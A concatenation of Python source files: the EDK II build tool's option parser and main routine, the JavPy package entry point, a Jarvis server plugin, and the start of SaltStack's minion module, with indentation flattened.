## Parse command line options
#
# Using standard Python module optparse to parse command line option of this tool.
#
# @retval Opt A optparse.Values object containing the parsed options
# @retval Args Target of build command
#
def MyOptionParser():
Parser = OptionParser(description=__copyright__, version=__version__, prog="build.exe", usage="%prog [options] [all|fds|genc|genmake|clean|cleanall|cleanlib|modules|libraries|run]")
Parser.add_option("-a", "--arch", action="append", type="choice", choices=['IA32', 'X64', 'EBC', 'ARM', 'AARCH64'], dest="TargetArch",
help="ARCHS is one of list: IA32, X64, ARM, AARCH64 or EBC, which overrides target.txt's TARGET_ARCH definition. To specify more archs, please repeat this option.")
Parser.add_option("-p", "--platform", action="callback", type="string", dest="PlatformFile", callback=SingleCheckCallback,
help="Build the platform specified by the DSC file name argument, overriding target.txt's ACTIVE_PLATFORM definition.")
Parser.add_option("-m", "--module", action="callback", type="string", dest="ModuleFile", callback=SingleCheckCallback,
help="Build the module specified by the INF file name argument.")
Parser.add_option("-b", "--buildtarget", type="string", dest="BuildTarget", help="Using the TARGET to build the platform, overriding target.txt's TARGET definition.",
action="append")
Parser.add_option("-t", "--tagname", action="append", type="string", dest="ToolChain",
help="Using the Tool Chain Tagname to build the platform, overriding target.txt's TOOL_CHAIN_TAG definition.")
Parser.add_option("-x", "--sku-id", action="callback", type="string", dest="SkuId", callback=SingleCheckCallback,
help="Using this name of SKU ID to build the platform, overriding SKUID_IDENTIFIER in DSC file.")
Parser.add_option("-n", action="callback", type="int", dest="ThreadNumber", callback=SingleCheckCallback,
help="Build the platform using multi-threaded compiler. The value overrides target.txt's MAX_CONCURRENT_THREAD_NUMBER. When value is set to 0, tool automatically detect number of "\
"processor threads, set value to 1 means disable multi-thread build, and set value to more than 1 means user specify the threads number to build.")
Parser.add_option("-f", "--fdf", action="callback", type="string", dest="FdfFile", callback=SingleCheckCallback,
help="The name of the FDF file to use, which overrides the setting in the DSC file.")
Parser.add_option("-r", "--rom-image", action="append", type="string", dest="RomImage", default=[],
help="The name of FD to be generated. The name must be from [FD] section in FDF file.")
Parser.add_option("-i", "--fv-image", action="append", type="string", dest="FvImage", default=[],
help="The name of FV to be generated. The name must be from [FV] section in FDF file.")
Parser.add_option("-C", "--capsule-image", action="append", type="string", dest="CapName", default=[],
help="The name of Capsule to be generated. The name must be from [Capsule] section in FDF file.")
Parser.add_option("-u", "--skip-autogen", action="store_true", dest="SkipAutoGen", help="Skip AutoGen step.")
Parser.add_option("-e", "--re-parse", action="store_true", dest="Reparse", help="Re-parse all meta-data files.")
Parser.add_option("-c", "--case-insensitive", action="store_true", dest="CaseInsensitive", default=False, help="Don't check case of file name.")
Parser.add_option("-w", "--warning-as-error", action="store_true", dest="WarningAsError", help="Treat warning in tools as error.")
Parser.add_option("-j", "--log", action="store", dest="LogFile", help="Put log in specified file as well as on console.")
Parser.add_option("-s", "--silent", action="store_true", type=None, dest="SilentMode",
help="Make use of silent mode of (n)make.")
Parser.add_option("-q", "--quiet", action="store_true", type=None, help="Disable all messages except FATAL ERRORS.")
Parser.add_option("-v", "--verbose", action="store_true", type=None, help="Turn on verbose output with informational messages printed, "\
"including library instances selected, final dependency expression, "\
"and warning messages, etc.")
Parser.add_option("-d", "--debug", action="store", type="int", help="Enable debug messages at specified level.")
Parser.add_option("-D", "--define", action="append", type="string", dest="Macros", help="Macro: \"Name [= Value]\".")
Parser.add_option("-y", "--report-file", action="store", dest="ReportFile", help="Create/overwrite the report to the specified filename.")
Parser.add_option("-Y", "--report-type", action="append", type="choice", choices=['PCD', 'LIBRARY', 'FLASH', 'DEPEX', 'BUILD_FLAGS', 'FIXED_ADDRESS', 'HASH', 'EXECUTION_ORDER'], dest="ReportType", default=[],
help="Flags that control the type of build report to generate. Must be one of: [PCD, LIBRARY, FLASH, DEPEX, BUILD_FLAGS, FIXED_ADDRESS, HASH, EXECUTION_ORDER]. "\
"To specify more than one flag, repeat this option on the command line and the default flag set is [PCD, LIBRARY, FLASH, DEPEX, HASH, BUILD_FLAGS, FIXED_ADDRESS]")
Parser.add_option("-F", "--flag", action="store", type="string", dest="Flag",
help="Specify the specific option to parse EDK UNI file. Must be one of: [-c, -s]. -c is for EDK framework UNI file, and -s is for EDK UEFI UNI file. "\
"This option can also be specified by setting *_*_*_BUILD_FLAGS in [BuildOptions] section of platform DSC. If they are both specified, this value "\
"will override the setting in [BuildOptions] section of platform DSC.")
Parser.add_option("-N", "--no-cache", action="store_true", dest="DisableCache", default=False, help="Disable build cache mechanism")
Parser.add_option("--conf", action="store", type="string", dest="ConfDirectory", help="Specify the customized Conf directory.")
Parser.add_option("--check-usage", action="store_true", dest="CheckUsage", default=False, help="Check usage content of entries listed in INF file.")
Parser.add_option("--ignore-sources", action="store_true", dest="IgnoreSources", default=False, help="Focus to a binary build and ignore all source files")
Parser.add_option("--pcd", action="append", dest="OptionPcd", help="Set PCD value by command line. Format: \"PcdName=Value\" ")
Parser.add_option("-l", "--cmd-len", action="store", type="int", dest="CommandLength", help="Specify the maximum line length of build command. Default is 4096.")
Parser.add_option("--hash", action="store_true", dest="UseHashCache", default=False, help="Enable hash-based caching during build process.")
Parser.add_option("--binary-destination", action="store", type="string", dest="BinCacheDest", help="Generate a cache of binary files in the specified directory.")
Parser.add_option("--binary-source", action="store", type="string", dest="BinCacheSource", help="Consume a cache of binary files from the specified directory.")
Parser.add_option("--genfds-multi-thread", action="store_true", dest="GenfdsMultiThread", default=False, help="Enable GenFds multi thread to generate ffs file.")
Parser.add_option("--disable-include-path-check", action="store_true", dest="DisableIncludePathCheck", default=False, help="Disable the include path check for outside of package.")
(Opt, Args) = Parser.parse_args()
return (Opt, Args)
## Tool entrance method
#
# This method mainly dispatch specific methods per the command line options.
# If no error found, return zero value so the caller of this tool can know
# if it's executed successfully or not.
#
# @retval 0 Tool was successful
# @retval 1 Tool failed
#
def Main():
StartTime = time.time()
# Initialize log system
EdkLogger.Initialize()
GlobalData.gCommand = sys.argv[1:]
#
# Parse the options and args
#
(Option, Target) = MyOptionParser()
GlobalData.gOptions = Option
GlobalData.gCaseInsensitive = Option.CaseInsensitive
# Set log level
if Option.verbose is not None:
EdkLogger.SetLevel(EdkLogger.VERBOSE)
elif Option.quiet is not None:
EdkLogger.SetLevel(EdkLogger.QUIET)
elif Option.debug is not None:
EdkLogger.SetLevel(Option.debug + 1)
else:
EdkLogger.SetLevel(EdkLogger.INFO)
if Option.LogFile is not None:
EdkLogger.SetLogFile(Option.LogFile)
if Option.WarningAsError == True:
EdkLogger.SetWarningAsError()
if platform.platform().find("Windows") >= 0:
GlobalData.gIsWindows = True
else:
GlobalData.gIsWindows = False
EdkLogger.quiet("Build environment: %s" % platform.platform())
EdkLogger.quiet(time.strftime("Build start time: %H:%M:%S, %b.%d %Y\n", time.localtime()));
ReturnCode = 0
MyBuild = None
BuildError = True
try:
if len(Target) == 0:
Target = "all"
elif len(Target) >= 2:
EdkLogger.error("build", OPTION_NOT_SUPPORTED, "More than one targets are not supported.",
ExtraData="Please select one of: %s" % (' '.join(gSupportedTarget)))
else:
Target = Target[0].lower()
if Target not in gSupportedTarget:
EdkLogger.error("build", OPTION_NOT_SUPPORTED, "Not supported target [%s]." % Target,
ExtraData="Please select one of: %s" % (' '.join(gSupportedTarget)))
#
# Check environment variable: EDK_TOOLS_PATH, WORKSPACE, PATH
#
CheckEnvVariable()
GlobalData.gCommandLineDefines.update(ParseDefines(Option.Macros))
Workspace = os.getenv("WORKSPACE")
#
# Get files real name in workspace dir
#
GlobalData.gAllFiles = Utils.DirCache(Workspace)
WorkingDirectory = os.getcwd()
if not Option.ModuleFile:
FileList = glob.glob(os.path.normpath(os.path.join(WorkingDirectory, '*.inf')))
FileNum = len(FileList)
if FileNum >= 2:
EdkLogger.error("build", OPTION_NOT_SUPPORTED, "There are %d INF files in %s." % (FileNum, WorkingDirectory),
ExtraData="Please use '-m <INF_FILE_PATH>' switch to choose one.")
elif FileNum == 1:
Option.ModuleFile = NormFile(FileList[0], Workspace)
if Option.ModuleFile:
if os.path.isabs (Option.ModuleFile):
if os.path.normcase (os.path.normpath(Option.ModuleFile)).find (Workspace) == 0:
Option.ModuleFile = NormFile(os.path.normpath(Option.ModuleFile), Workspace)
Option.ModuleFile = PathClass(Option.ModuleFile, Workspace)
ErrorCode, ErrorInfo = Option.ModuleFile.Validate(".inf", False)
if ErrorCode != 0:
EdkLogger.error("build", ErrorCode, ExtraData=ErrorInfo)
if Option.PlatformFile is not None:
if os.path.isabs (Option.PlatformFile):
if os.path.normcase (os.path.normpath(Option.PlatformFile)).find (Workspace) == 0:
Option.PlatformFile = NormFile(os.path.normpath(Option.PlatformFile), Workspace)
Option.PlatformFile = PathClass(Option.PlatformFile, Workspace)
if Option.FdfFile is not None:
if os.path.isabs (Option.FdfFile):
if os.path.normcase (os.path.normpath(Option.FdfFile)).find (Workspace) == 0:
Option.FdfFile = NormFile(os.path.normpath(Option.FdfFile), Workspace)
Option.FdfFile = PathClass(Option.FdfFile, Workspace)
ErrorCode, ErrorInfo = Option.FdfFile.Validate(".fdf", False)
if ErrorCode != 0:
EdkLogger.error("build", ErrorCode, ExtraData=ErrorInfo)
if Option.Flag is not None and Option.Flag not in ['-c', '-s']:
EdkLogger.error("build", OPTION_VALUE_INVALID, "UNI flag must be one of -c or -s")
MyBuild = Build(Target, Workspace, Option)
GlobalData.gCommandLineDefines['ARCH'] = ' '.join(MyBuild.ArchList)
if not (MyBuild.LaunchPrebuildFlag and os.path.exists(MyBuild.PlatformBuildPath)):
MyBuild.Launch()
#
# All job done, no error found and no exception raised
#
BuildError = False
except FatalError as X:
if MyBuild is not None:
# for multi-thread build exits safely
MyBuild.Relinquish()
if Option is not None and Option.debug is not None:
EdkLogger.quiet("(Python %s on %s) " % (platform.python_version(), sys.platform) + traceback.format_exc())
ReturnCode = X.args[0]
except Warning as X:
# error from Fdf parser
if MyBuild is not None:
# for multi-thread build exits safely
MyBuild.Relinquish()
if Option is not None and Option.debug is not None:
EdkLogger.quiet("(Python %s on %s) " % (platform.python_version(), sys.platform) + traceback.format_exc())
else:
EdkLogger.error(X.ToolName, FORMAT_INVALID, File=X.FileName, Line=X.LineNumber, ExtraData=X.Message, RaiseError=False)
ReturnCode = FORMAT_INVALID
except KeyboardInterrupt:
ReturnCode = ABORT_ERROR
if Option is not None and Option.debug is not None:
EdkLogger.quiet("(Python %s on %s) " % (platform.python_version(), sys.platform) + traceback.format_exc())
except:
if MyBuild is not None:
# for multi-thread build exits safely
MyBuild.Relinquish()
# try to get the meta-file from the object causing exception
Tb = sys.exc_info()[-1]
MetaFile = GlobalData.gProcessingFile
while Tb is not None:
if 'self' in Tb.tb_frame.f_locals and hasattr(Tb.tb_frame.f_locals['self'], 'MetaFile'):
MetaFile = Tb.tb_frame.f_locals['self'].MetaFile
Tb = Tb.tb_next
EdkLogger.error(
"\nbuild",
CODE_ERROR,
"Unknown fatal error when processing [%s]" % MetaFile,
ExtraData="\n(Please send email to [email protected] for help, attaching following call stack trace!)\n",
RaiseError=False
)
EdkLogger.quiet("(Python %s on %s) " % (platform.python_version(), sys.platform) + traceback.format_exc())
ReturnCode = CODE_ERROR
finally:
Utils.Progressor.Abort()
Utils.ClearDuplicatedInf()
if ReturnCode == 0:
try:
MyBuild.LaunchPostbuild()
Conclusion = "Done"
except:
Conclusion = "Failed"
elif ReturnCode == ABORT_ERROR:
Conclusion = "Aborted"
else:
Conclusion = "Failed"
FinishTime = time.time()
BuildDuration = time.gmtime(int(round(FinishTime - StartTime)))
BuildDurationStr = ""
if BuildDuration.tm_yday > 1:
BuildDurationStr = time.strftime("%H:%M:%S", BuildDuration) + ", %d day(s)" % (BuildDuration.tm_yday - 1)
else:
BuildDurationStr = time.strftime("%H:%M:%S", BuildDuration)
if MyBuild is not None:
if not BuildError:
MyBuild.BuildReport.GenerateReport(BuildDurationStr, LogBuildTime(MyBuild.AutoGenTime), LogBuildTime(MyBuild.MakeTime), LogBuildTime(MyBuild.GenFdsTime))
EdkLogger.SetLevel(EdkLogger.QUIET)
EdkLogger.quiet("\n- %s -" % Conclusion)
EdkLogger.quiet(time.strftime("Build end time: %H:%M:%S, %b.%d %Y", time.localtime()))
EdkLogger.quiet("Build total time: %s\n" % BuildDurationStr)
return ReturnCode
if __name__ == '__main__':
r = Main()
## 0-127 is a safe return range, and 1 is a standard default error
if r < 0 or r > 127: r = 1
sys.exit(r)
|
__init__.py
|
from .app.webserver.app import app
from .app.tgbot.server import run
import os
import time
import threading
import sys
print(r"""
__ ____
/ /___ __ __/ __ \__ __
__ / / __ `/ | / / /_/ / / / /
/ /_/ / /_/ /| |/ / ____/ /_/ /
\____/\__,_/ |___/_/ \__, /
/____/
Awesome! Now try to type
JavPy.serve()
and open http://localhost:8081 to enjoy driving!
If you want to run a telegram bot server, instead, please type
JavPy.serve_tg(token)
But please get a token from the bot father first
More info: https://github.com/theodorekrypton/JavPy
""")
def open_browser(port):
time.sleep(5)
url = "http://localhost:" + str(port)
if "win32" in sys.platform:
os.system("start \"\" \"" + url + "\"")
elif "linux" in sys.platform:
os.system("xdg-open " + url)
else:
os.system("open " + url)
def serve(port=8081):
threading.Thread(target=open_browser, args=(port,)).start()
app.run('0.0.0.0', port, threaded=True)
def serve_tg(token):
run(token)
|
jarvis_server.py
|
from multiprocessing import Process
from plugin import Platform, require, plugin
@require(network=True, platform=Platform.MACOS)
@plugin("server start")
def server_start(jarvis, s):
jarvis_server = jarvis.get_server()
if s != "":
if ":" in s:
jarvis_server.server_host, jarvis_server.port = s.split(":")[0], int(s.split(":")[1])
else:
jarvis_server.server_host, jarvis_server.port = s.split(" ")[0], int(s.split(" ")[1])
jarvis.server_thread = Process(target=jarvis_server.start_server)
jarvis.server_thread.start()
@require(network=True, platform=Platform.MACOS)
@plugin("server stop")
def server_stop(jarvis, s):
if not hasattr(jarvis, "server_thread") or jarvis.server_thread is not None:
jarvis.say("No server is running.")
return
# server.stop_server(jarvis)
# print(jarvis.server_thread.isAlive())
jarvis.server_thread.terminate()
jarvis.server_thread.join()
jarvis.server_thread = None
@require(network=True, platform=Platform.MACOS)
@plugin("server restart")
def server_restart(jarvis, s):
server_stop(jarvis, s)
server_start(jarvis, s)
#
#
# @require(network=True)
# @plugin("home server")
# class HomeServer(BaseHTTPRequestHandler):
#
# def __init__(self, request, client_address, server):
# super().__init__(request, client_address, server)
# self.devices = dict()
# self.app_logins = dict()
#
# def do_POST(self):
# if self.request_handler.headers["Auth"] != auth:
# self._return_unauthorized()
# else:
# content_len = int(self.headers.get('Content-Length'))
# device_type = self.headers.get('User-Agent')
# post_body = self.rfile.read(content_len)
# print(self.headers.get('Device-Agent') + " found!")
# if device_type.contains("ESP8266"):
# self._register_device(self.headers, post_body)
# self._respond(200, '')
# else:
# response_type = self._respond_to_agent(self.headers, post_body)
# if response_type == "Success":
# self._respond(200, response_type)
# elif response_type is not None:
# self._respond(404, response_type)
#
# def _respond(self, code: int, message: str):
# self.send_response(code)
# self.send_header("Auth", auth)
# self.end_headers()
# self.wfile.write(message.encode('utf-8'))
#
# def _register_device(self, headers, body):
# agent = headers["Device-Agent"]
# self.devices[agent] = dict(json.loads(body.decode('utf-8')))
# self.devices[agent]["counter"] = 0
# self.devices[agent]["connected"] = True
# self.devices[agent]["thread"] = Thread(target=self._handle_heartbeat,
# args=(agent,))
# self.devices[agent]["thread"].start()
#
# def _respond_to_agent(self, headers, body):
# agent = headers["Device-Agent"]
# self.app_logins[agent] = dict(json.loads(body.decode('utf-8')))
# self.app_logins[agent]["connected"] = True
# return self._handle_app_request(agent)
#
# def _handle_app_request(self, agent: str):
# app_request_type = self.app_logins[agent]["request_type"]
#
# if app_request_type == 'intro':
# return self._send_intro_to_app()
#
# return self._respond_to_app_request(agent)
#
# def _send_intro_to_app(self):
# app_intro = dict()
# app_intro["devices"] = self.get_connected_devices()
# app_intro["users"] = self.get_connected_users()
# return json.dumps(app_intro)
#
# def _respond_to_app_request(self, agent: str):
# app_request = self.app_logins[agent]["request"]
# device = app_request["device"]
# device_switch = app_request["switch"]
# device_switch_request = device_switch["request"]
# device_switch_value = device_switch["value"]
# if not self.devices[device]["connected"]:
# return "Device disconnected"
# device_url = self.devices[device]["localIP"]
# device_headers = dict({"Auth": auth})
#
# try:
# request = requests.get(device_url + "/" + device_switch_request +
# "/" + device_switch_value, headers=device_headers)
# except requests.exceptions.ConnectionError as ce:
# print("Device Connection Error: " + agent)
# self.devices[agent]["connected"] = False
# return "Device disconnected"
# return "Success"
#
# def _handle_heartbeat(self, agent: str):
# device_url = self.devices[agent]["localIP"]
# while self.devices[agent]["connected"]:
# device_headers = dict({"Auth": auth})
# try:
# request = requests.get(device_url + "/heartbeat",
# headers=device_headers)
# self.devices[agent]["counter"] = 0
# except requests.exceptions.ConnectionError as ce:
# print(ce)
# print("Device Connection Error: " + agent)
# self.devices[agent]["counter"] += 1
# if self.devices[agent]["counter"] >= 3:
# self.devices[agent]["connected"] = False
# time.sleep(5)
#
# def get_connected_devices(self):
# connected_devices = [device for device in self.devices.keys()
# if self.devices[device]["connected"]]
# print(connected_devices)
# return connected_devices
#
# def get_connected_users(self):
# connected_users = [user for user in self.app_logins.keys()
# if self.app_logins[user]["connected"]]
# return connected_users
#
# def _return_unauthorized(self):
# self.send_response(403)
# self.send_header("Status Code", 403)
# self.end_headers()
# self.wfile.write(b'Unauthorized')
#
#
# @require(network=True, platform=MACOS)
# @plugin('home server start')
# def home_server(jarvis, s):
# web_server = HTTPServer((hostName, serverPort), HomeServer)
# web_server.serve_forever()
# jarvis.say("Server started http://%s:%s" % (hostName, serverPort))
#
#
# @require(network=True, platform=MACOS)
# @plugin('home server connections')
# def home_server_get_connections(jarvis, s):
# if web_server is None:
# jarvis.say("Unable to find a running server. Did you start a Server ?")
# return
# connections = dict()
# connections["devices"] = web_server.get_connected_devices()
# connections["users"] = web_server.get_connected_users()
# return json.dumps(connections)
#
#
# @require(network=True, platform=MACOS)
# @plugin('home server stop')
# def home_server_stop(jarvis, s):
# if web_server is None:
# jarvis.say("Unable to stop server. Did you start a Server ?")
# return
# web_server.server_close()
# jarvis.say("Server killed!")
|
minion.py
|
# -*- coding: utf-8 -*-
'''
Routines to set up a minion
'''
# Import python libs
from __future__ import absolute_import, print_function, with_statement
import os
import re
import sys
import copy
import time
import types
import signal
import fnmatch
import logging
import threading
import traceback
import contextlib
import multiprocessing
from random import randint, shuffle
from stat import S_IMODE
# Import Salt Libs
# pylint: disable=import-error,no-name-in-module,redefined-builtin
import salt.ext.six as six
if six.PY3:
import ipaddress
else:
import salt.ext.ipaddress as ipaddress
from salt.ext.six.moves import range
# pylint: enable=no-name-in-module,redefined-builtin
# Import third party libs
try:
import zmq
# TODO: cleanup
import zmq.eventloop.ioloop
# support pyzmq 13.0.x, TODO: remove once we force people to 14.0.x
if not hasattr(zmq.eventloop.ioloop, 'ZMQIOLoop'):
zmq.eventloop.ioloop.ZMQIOLoop = zmq.eventloop.ioloop.IOLoop
LOOP_CLASS = zmq.eventloop.ioloop.ZMQIOLoop
HAS_ZMQ = True
except ImportError:
import tornado.ioloop
LOOP_CLASS = tornado.ioloop.IOLoop
HAS_ZMQ = False
HAS_RANGE = False
try:
import seco.range
HAS_RANGE = True
except ImportError:
pass
HAS_PSUTIL = False
try:
import salt.utils.psutil_compat as psutil
HAS_PSUTIL = True
except ImportError:
pass
HAS_RESOURCE = False
try:
import resource
HAS_RESOURCE = True
except ImportError:
pass
try:
import zmq.utils.monitor
HAS_ZMQ_MONITOR = True
except ImportError:
HAS_ZMQ_MONITOR = False
# pylint: enable=import-error
# Import salt libs
import salt
import salt.client
import salt.crypt
import salt.loader
import salt.beacons
import salt.engines
import salt.payload
import salt.syspaths
import salt.utils
import salt.utils.dictupdate
import salt.utils.context
import salt.utils.jid
import salt.pillar
import salt.utils.args
import salt.utils.event
import salt.utils.minion
import salt.utils.minions
import salt.utils.schedule
import salt.utils.error
import salt.utils.zeromq
import salt.defaults.exitcodes
import salt.cli.daemons
import salt.log.setup
from salt.config import DEFAULT_MINION_OPTS
from salt.defaults import DEFAULT_TARGET_DELIM
from salt.executors import FUNCTION_EXECUTORS
from salt.utils.debug import enable_sigusr1_handler
from salt.utils.event import tagify
from salt.utils.odict import OrderedDict
from salt.utils.process import (default_signals,
SignalHandlingMultiprocessingProcess,
ProcessManager)
from salt.exceptions import (
CommandExecutionError,
CommandNotFoundError,
SaltInvocationError,
SaltReqTimeoutError,
SaltClientError,
SaltSystemExit,
SaltDaemonNotRunning,
SaltException,
)
import tornado.gen # pylint: disable=F0401
import tornado.ioloop # pylint: disable=F0401
log = logging.getLogger(__name__)
# To set up a minion:
# 1. Read in the configuration
# 2. Generate the function mapping dict
# 3. Authenticate with the master
# 4. Store the AES key
# 5. Connect to the publisher
# 6. Handle publications
def resolve_dns(opts, fallback=True):
'''
Resolves the master_ip and master_uri options
'''
ret = {}
check_dns = True
if (opts.get('file_client', 'remote') == 'local' and
not opts.get('use_master_when_local', False)):
check_dns = False
if check_dns is True:
# Because I import salt.log below I need to re-import salt.utils here
import salt.utils
try:
if opts['master'] == '':
raise SaltSystemExit
ret['master_ip'] = \
salt.utils.dns_check(opts['master'], True, opts['ipv6'])
except SaltClientError:
if opts['retry_dns']:
while True:
import salt.log
msg = ('Master hostname: \'{0}\' not found. Retrying in {1} '
'seconds').format(opts['master'], opts['retry_dns'])
if salt.log.setup.is_console_configured():
log.error(msg)
else:
print('WARNING: {0}'.format(msg))
time.sleep(opts['retry_dns'])
try:
ret['master_ip'] = salt.utils.dns_check(
opts['master'], True, opts['ipv6']
)
break
except SaltClientError:
pass
else:
if fallback:
ret['master_ip'] = '127.0.0.1'
else:
raise
except SaltSystemExit:
unknown_str = 'unknown address'
master = opts.get('master', unknown_str)
if master == '':
master = unknown_str
if opts.get('__role') == 'syndic':
err = 'Master address: \'{0}\' could not be resolved. Invalid or unresolveable address. Set \'syndic_master\' value in minion config.'.format(master)
else:
err = 'Master address: \'{0}\' could not be resolved. Invalid or unresolveable address. Set \'master\' value in minion config.'.format(master)
log.error(err)
raise SaltSystemExit(code=42, msg=err)
else:
ret['master_ip'] = '127.0.0.1'
if 'master_ip' in ret and 'master_ip' in opts:
if ret['master_ip'] != opts['master_ip']:
log.warning('Master ip address changed from {0} to {1}'.format(opts['master_ip'],
ret['master_ip'])
)
ret['master_uri'] = 'tcp://{ip}:{port}'.format(ip=ret['master_ip'],
port=opts['master_port'])
return ret
def prep_ip_port(opts):
ret = {}
if opts['master_uri_format'] == 'ip_only':
ret['master'] = opts['master']
else:
ip_port = opts['master'].rsplit(":", 1)
if len(ip_port) == 1:
# e.g. master: mysaltmaster
ret['master'] = ip_port[0]
else:
# e.g. master: localhost:1234
# e.g. master: 127.0.0.1:1234
# e.g. master: ::1:1234
ret['master'] = ip_port[0]
ret['master_port'] = ip_port[1]
return ret
def get_proc_dir(cachedir, **kwargs):
'''
Given the cache directory, return the directory that process data is
stored in, creating it if it doesn't exist.
The following optional Keyword Arguments are handled:
mode: which is anything os.makedir would accept as mode.
uid: the uid to set, if not set, or it is None or -1 no changes are
made. Same applies if the directory is already owned by this
uid. Must be int. Works only on unix/unix like systems.
gid: the gid to set, if not set, or it is None or -1 no changes are
made. Same applies if the directory is already owned by this
gid. Must be int. Works only on unix/unix like systems.
'''
fn_ = os.path.join(cachedir, 'proc')
mode = kwargs.pop('mode', None)
if mode is None:
mode = {}
else:
mode = {'mode': mode}
if not os.path.isdir(fn_):
# proc_dir is not present, create it with mode settings
os.makedirs(fn_, **mode)
d_stat = os.stat(fn_)
# if mode is not an empty dict then we have an explicit
# dir mode. So lets check if mode needs to be changed.
if mode:
mode_part = S_IMODE(d_stat.st_mode)
if mode_part != mode['mode']:
os.chmod(fn_, (d_stat.st_mode ^ mode_part) | mode['mode'])
if hasattr(os, 'chown'):
# only on unix/unix like systems
uid = kwargs.pop('uid', -1)
gid = kwargs.pop('gid', -1)
# if uid and gid are both -1 then go ahead with
# no changes at all
if (d_stat.st_uid != uid or d_stat.st_gid != gid) and \
[i for i in (uid, gid) if i != -1]:
os.chown(fn_, uid, gid)
return fn_
def load_args_and_kwargs(func, args, data=None, ignore_invalid=False):
'''
Detect the args and kwargs that need to be passed to a function call, and
check them against what was passed.
'''
argspec = salt.utils.args.get_function_argspec(func)
_args = []
_kwargs = {}
invalid_kwargs = []
for arg in args:
if isinstance(arg, six.string_types):
string_arg, string_kwarg = salt.utils.args.parse_input([arg], condition=False) # pylint: disable=W0632
if string_arg:
# Don't append the version that was just derived from parse_cli
# above, that would result in a 2nd call to
# salt.utils.cli.yamlify_arg(), which could mangle the input.
_args.append(arg)
elif string_kwarg:
salt.utils.warn_until(
'Nitrogen',
'The list of function args and kwargs should be parsed '
'by salt.utils.args.parse_input() before calling '
'salt.minion.load_args_and_kwargs().'
)
if argspec.keywords or next(six.iterkeys(string_kwarg)) in argspec.args:
# Function supports **kwargs or is a positional argument to
# the function.
_kwargs.update(string_kwarg)
else:
# **kwargs not in argspec and parsed argument name not in
# list of positional arguments. This keyword argument is
# invalid.
for key, val in six.iteritems(string_kwarg):
invalid_kwargs.append('{0}={1}'.format(key, val))
continue
# if the arg is a dict with __kwarg__ == True, then its a kwarg
elif isinstance(arg, dict) and arg.pop('__kwarg__', False) is True:
for key, val in six.iteritems(arg):
if argspec.keywords or key in argspec.args:
# Function supports **kwargs or is a positional argument to
# the function.
_kwargs[key] = val
else:
# **kwargs not in argspec and parsed argument name not in
# list of positional arguments. This keyword argument is
# invalid.
invalid_kwargs.append('{0}={1}'.format(key, val))
continue
else:
_args.append(arg)
if invalid_kwargs and not ignore_invalid:
salt.utils.invalid_kwargs(invalid_kwargs)
if argspec.keywords and isinstance(data, dict):
# this function accepts **kwargs, pack in the publish data
for key, val in six.iteritems(data):
_kwargs['__pub_{0}'.format(key)] = val
return _args, _kwargs
def eval_master_func(opts):
'''
Evaluate master function if master type is 'func'
and save it result in opts['master']
'''
if '__master_func_evaluated' not in opts:
# split module and function and try loading the module
mod_fun = opts['master']
mod, fun = mod_fun.split('.')
try:
master_mod = salt.loader.raw_mod(opts, mod, fun)
if not master_mod:
raise KeyError
# we take whatever the module returns as master address
opts['master'] = master_mod[mod_fun]()
if not isinstance(opts['master'], str):
raise TypeError
opts['__master_func_evaluated'] = True
except KeyError:
log.error('Failed to load module {0}'.format(mod_fun))
sys.exit(salt.defaults.exitcodes.EX_GENERIC)
except TypeError:
log.error('{0} returned from {1} is not a string'.format(opts['master'], mod_fun))
sys.exit(salt.defaults.exitcodes.EX_GENERIC)
log.info('Evaluated master from module: {0}'.format(mod_fun))
def master_event(type, master=None):
'''
Centralized master event function which will return event type based on event_map
'''
event_map = {'connected': '__master_connected',
'disconnected': '__master_disconnected',
'failback': '__master_failback',
'alive': '__master_alive'}
if type == 'alive' and master is not None:
return '{0}_{1}'.format(event_map.get(type), master)
return event_map.get(type, None)
class MinionBase(object):
def __init__(self, opts):
self.opts = opts
@staticmethod
def process_schedule(minion, loop_interval):
try:
if hasattr(minion, 'schedule'):
minion.schedule.eval()
else:
log.error('Minion scheduler not initialized. Scheduled jobs will not be run.')
return
# Check if scheduler requires lower loop interval than
# the loop_interval setting
if minion.schedule.loop_interval < loop_interval:
loop_interval = minion.schedule.loop_interval
log.debug(
'Overriding loop_interval because of scheduled jobs.'
)
except Exception as exc:
log.error(
'Exception {0} occurred in scheduled job'.format(exc)
)
return loop_interval
def process_beacons(self, functions):
'''
Evaluate all of the configured beacons, grab the config again in case
the pillar or grains changed
'''
if 'config.merge' in functions:
b_conf = functions['config.merge']('beacons', self.opts['beacons'], omit_opts=True)
if b_conf:
return self.beacons.process(b_conf, self.opts['grains']) # pylint: disable=no-member
return []
@tornado.gen.coroutine
def eval_master(self,
opts,
timeout=60,
safe=True,
failed=False,
failback=False):
'''
Evaluates and returns a tuple of the current master address and the pub_channel.
In standard mode, just creates a pub_channel with the given master address.
With master_type=func evaluates the current master address from the given
module and then creates a pub_channel.
With master_type=failover takes the list of masters and loops through them.
The first one that allows the minion to create a pub_channel is then
returned. If this function is called outside the minions initialization
phase (for example from the minions main event-loop when a master connection
loss was detected), 'failed' should be set to True. The current
(possibly failed) master will then be removed from the list of masters.
'''
# return early if we are not connecting to a master
if opts['master_type'] == 'disable':
log.warning('Master is set to disable, skipping connection')
self.connected = False
raise tornado.gen.Return((None, None))
# check if master_type was altered from its default
elif opts['master_type'] != 'str' and opts['__role'] != 'syndic':
# check for a valid keyword
if opts['master_type'] == 'func':
eval_master_func(opts)
# if failover is set, master has to be of type list
elif opts['master_type'] == 'failover':
if isinstance(opts['master'], list):
log.info('Got list of available master addresses:'
' {0}'.format(opts['master']))
if opts['master_shuffle']:
if opts['master_failback']:
secondary_masters = opts['master'][1:]
shuffle(secondary_masters)
opts['master'][1:] = secondary_masters
else:
shuffle(opts['master'])
opts['auth_tries'] = 0
if opts['master_failback'] and opts['master_failback_interval'] == 0:
opts['master_failback_interval'] = opts['master_alive_interval']
# if opts['master'] is a str and we have never created opts['master_list']
elif isinstance(opts['master'], str) and ('master_list' not in opts):
# We have a string, but a list was what was intended. Convert.
# See issue 23611 for details
opts['master'] = [opts['master']]
elif opts['__role'] == 'syndic':
log.info('Syndic setting master_syndic to \'{0}\''.format(opts['master']))
# if failed=True, the minion was previously connected
# we're probably called from the minions main-event-loop
# because a master connection loss was detected. remove
# the possibly failed master from the list of masters.
elif failed:
if failback:
# failback list of masters to original config
opts['master'] = opts['master_list']
else:
log.info('Moving possibly failed master {0} to the end of'
' the list of masters'.format(opts['master']))
if opts['master'] in opts['local_masters']:
# create new list of master with the possibly failed
# one moved to the end
failed_master = opts['master']
opts['master'] = [x for x in opts['local_masters'] if opts['master'] != x]
opts['master'].append(failed_master)
else:
